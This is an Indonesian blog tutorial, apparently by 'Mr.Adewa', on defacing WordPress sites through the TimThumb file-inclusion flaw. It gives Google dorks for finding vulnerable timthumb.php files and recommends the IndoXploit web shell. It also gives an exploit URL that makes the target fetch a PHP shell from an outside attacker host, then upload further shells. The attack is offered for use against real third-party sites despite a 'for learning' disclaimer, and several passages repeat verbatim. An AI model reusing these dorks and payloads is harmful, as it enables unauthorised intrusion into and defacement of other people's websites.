Deface Metode ThimThumb Exploit Wordpres
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode ThimThumb Exploit Wordpres
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode ThimThumb Exploit Wordpres
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja
-Dork
-Exploit
1. Kembangkan dork di atas, bagian timthumb ubah aja menjadi tum atau thumb agar dapat yg vuln
2. Jika sudah masukkan exploitnya seperti ini
site.co.li/[PATCH]/thumb.php
Jika vuln akan ada seperti ini
Catatan:Bug ini ada di thimthumb version 2.00 ke bawah
3. Langsung aja kita exsekusi (Upload shel) dengan cara tambahkan exploit upload shel di atas di bagian thumb.php seperti ini
site.co.li/[PATHC]/thumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
4. Jika work akan ada md5 seperti di bawah ini, Md5 tersebut adalah shel kalian
5. Buka tab baru di browser kalian, kemudian copykan aksese shel kalian
Di sini saya hanya menggunakan uploader
6. Upload shel kalian
Mungkin itulah sedikit penjelasan mengenai "Deface Metode ThimThumb Exploit Wordpres"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb
-Shel
Gunakan shel IndoXploit saja
-Dork
inurl:/wp-content/themes/deepfocus/timthumb.phpKembangin aja agar dapat yg vuln
inurl:/wp-content/themes/infores/timthumb.php
inurl:/timthumb.php site
-Exploit
thimthumb.php-Exploit Upload shel
tum.php
thumb.php DLL
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.phpBaiklah langsung saja kita mulai
1. Kembangkan dork di atas, bagian timthumb ubah aja menjadi tum atau thumb agar dapat yg vuln
2. Jika sudah masukkan exploitnya seperti ini
site.co.li/[PATCH]/thumb.php
Jika vuln akan ada seperti ini
Catatan:Bug ini ada di thimthumb version 2.00 ke bawah
3. Langsung aja kita exsekusi (Upload shel) dengan cara tambahkan exploit upload shel di atas di bagian thumb.php seperti ini
site.co.li/[PATHC]/thumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
4. Jika work akan ada md5 seperti di bawah ini, Md5 tersebut adalah shel kalian
5. Buka tab baru di browser kalian, kemudian copykan aksese shel kalian
Di sini saya hanya menggunakan uploader
6. Upload shel kalian
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb